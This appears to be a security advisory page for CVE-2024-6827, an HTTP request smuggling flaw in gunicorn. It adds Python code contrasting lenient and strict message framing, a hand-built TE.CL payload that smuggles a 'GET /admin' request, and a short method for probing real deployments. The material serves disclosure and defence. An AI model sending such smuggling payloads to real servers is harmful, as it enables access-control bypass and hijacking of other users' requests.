PyPI: gunicorn
CVE-2024-6827
Safety vulnerability ID: SFTY-20250320-19787
Safety legacy ID: pyup.io-76244
Overview
Gunicorn HTTP Request/Response Smuggling vulnerability
Advisory
Affected versions of the gunicorn package are vulnerable to HTTP Request/Response Smuggling because the Transfer-Encoding header is not validated properly, which enables a TE.CL desynchronisation. Gunicorn's HTTP parser does not consistently enforce the RFC 9112 message-framing rules when a request carries conflicting or unsupported framing, for example a message that contains both Transfer-Encoding and Content-Length, or a Transfer-Encoding value the parser does not treat as chunked. Instead of rejecting such a message, gunicorn falls back to Content-Length, while a front-end proxy that honours the Transfer-Encoding header frames the same message as chunked. The two sides therefore disagree on where the request ends, and the attacker-controlled bytes beyond the Content-Length boundary are parsed by gunicorn as the start of a new request on the same connection. The condition is only reachable through an intermediary that reuses its connection to gunicorn and frames by Transfer-Encoding; the impact then follows the usual request-smuggling pattern (bypassing front-end access controls, poisoning cached responses, hijacking other users' requests).
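The following is an added illustration of the TE.CL split described above; it is not gunicorn's own parser and not the proof of concept from the huntr report. It frames one raw request two ways: `frame_lenient` models the fallback the advisory describes (only the literal value `chunked` selects chunked framing, any other Transfer-Encoding value is ignored and Content-Length is used), and `frame_strict` models the RFC 9112 behaviour a hardened server should have (reject an unimplemented transfer coding, reject Transfer-Encoding together with Content-Length). The request bytes, the `identity, chunked` value and the `/admin` path are constructed for this example; which exact values a given gunicorn release mis-handles is documented in the references, not here.

```python
class InvalidHeader(ValueError):
    pass

class UnsupportedTransferCoding(ValueError):
    pass

def split_message(raw):
    """Split a raw HTTP/1.1 message into (request line, [(NAME, value)], body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().upper().decode("ascii"), value.strip().decode("ascii")))
    return lines[0].decode("ascii"), headers, body

def read_chunked(body):
    """Decode a chunked body (no trailers); return (decoded, bytes left after the last chunk)."""
    decoded, pos = b"", 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # chunk extensions ignored
        pos = eol + 2
        if size == 0:
            if body[pos:pos + 2] != b"\r\n":
                raise InvalidHeader("trailer section not supported in this example")
            return decoded, body[pos + 2:]
        decoded += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise InvalidHeader("bad chunk terminator")
        pos += 2

def frame_lenient(headers, body):
    """Vulnerable policy modelled on the advisory: only the literal value 'chunked'
    selects chunked framing; any other Transfer-Encoding value is ignored and the
    body length silently comes from Content-Length (or defaults to zero)."""
    chunked, content_length = False, 0
    for name, value in headers:
        if name == "CONTENT-LENGTH":
            content_length = int(value)
        elif name == "TRANSFER-ENCODING" and value.lower() == "chunked":
            chunked = True
    if chunked:
        return read_chunked(body)
    return body[:content_length], body[content_length:]

def frame_strict(headers, body):
    """Hardened policy (RFC 9112 section 6): an unimplemented transfer coding is
    rejected rather than ignored, and Transfer-Encoding plus Content-Length is
    rejected outright instead of guessing which one the peer will use."""
    has_te, content_length = False, None
    for name, value in headers:
        if name == "CONTENT-LENGTH":
            if content_length is not None:
                raise InvalidHeader("duplicate Content-Length")
            content_length = int(value)
        elif name == "TRANSFER-ENCODING":
            if has_te:
                raise InvalidHeader("duplicate Transfer-Encoding")
            if [c.strip().lower() for c in value.split(",")] != ["chunked"]:
                raise UnsupportedTransferCoding(value)  # only chunked is implemented here
            has_te = True
    if has_te and content_length is not None:
        raise InvalidHeader("Transfer-Encoding and Content-Length both present")
    if has_te:
        return read_chunked(body)
    n = content_length or 0
    return body[:n], body[n:]

# Constructed attack message (not the huntr proof of concept): a front-end that
# accepts "identity, chunked" as chunked framing forwards the whole message; a
# back-end using frame_lenient fails the literal 'chunked' test and takes
# Content-Length: 4, which covers exactly the chunk-size line "3e\r\n".
SMUGGLED = (
    b"GET /admin HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Length: 7\r\n"  # swallows the "\r\n0\r\n\r\n" that closes the outer chunked body
    b"\r\n"
)  # 62 bytes == 0x3e
ATTACK = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Length: 4\r\n"
    b"Transfer-Encoding: identity, chunked\r\n"
    b"\r\n"
    b"3e\r\n" + SMUGGLED + b"\r\n0\r\n\r\n"
)

def front_end_view(raw=ATTACK):
    """Proxy framing by the chunked coding: one body, nothing left on the connection."""
    return read_chunked(split_message(raw)[2])

def back_end_view(raw=ATTACK):
    """Lenient back-end: Content-Length framing leaves a second, attacker-chosen
    request on the socket, which is then parsed as if the client had sent it."""
    _, headers, body = split_message(raw)
    first_body, leftover = frame_lenient(headers, body)
    line, headers2, body2 = split_message(leftover)
    second_body, rest = frame_lenient(headers2, body2)
    return first_body, line, second_body, rest

def hardened_view(raw=ATTACK):
    """Strict back-end: the message is refused, so there is nothing to desync."""
    _, headers, body = split_message(raw)
    try:
        frame_strict(headers, body)
    except (InvalidHeader, UnsupportedTransferCoding) as exc:
        return type(exc).__name__
    return "accepted"
```

Calling `front_end_view()` returns the single decoded body with an empty remainder, `back_end_view()` returns `b"3e\r\n"` as the first body and then `GET /admin HTTP/1.1` as a brand-new request that the proxy never saw, and `hardened_view()` returns `UnsupportedTransferCoding` because the strict policy refuses the message before any body is read. The practical check against a real deployment is the same shape: send a request whose Transfer-Encoding value the proxy accepts but the back-end may not, and watch whether a follow-up request on the same front-end connection receives a response to the smuggled prefix.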
How to Fix
Mitigation and Workarounds
Vulnerable Functions
Functions linked to known vulnerabilities.
References
- https://getsafety.com/vulnerabilities/SFTY-20250320-19787/CVE-2024-6827
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6827
- https://github.com/advisories/GHSA-hc5x-x2vx-497g
- https://nvd.nist.gov/vuln/detail/CVE-2024-6827
- https://huntr.com/bounties/1b4f8f38-39da-44b6-9f98-f618639d0dd7
- https://github.com/benoitc/gunicorn/issues/3278
- https://github.com/benoitc/gunicorn/issues/3087
- https://github.com/benoitc/gunicorn/pull/3113
- https://github.com/benoitc/gunicorn/releases/tag/22.0.0
Verified by Safety
Our Cybersecurity Intelligence Team reviewed this vulnerability. We combine public data with our own research to find issues not yet reported to public sources.
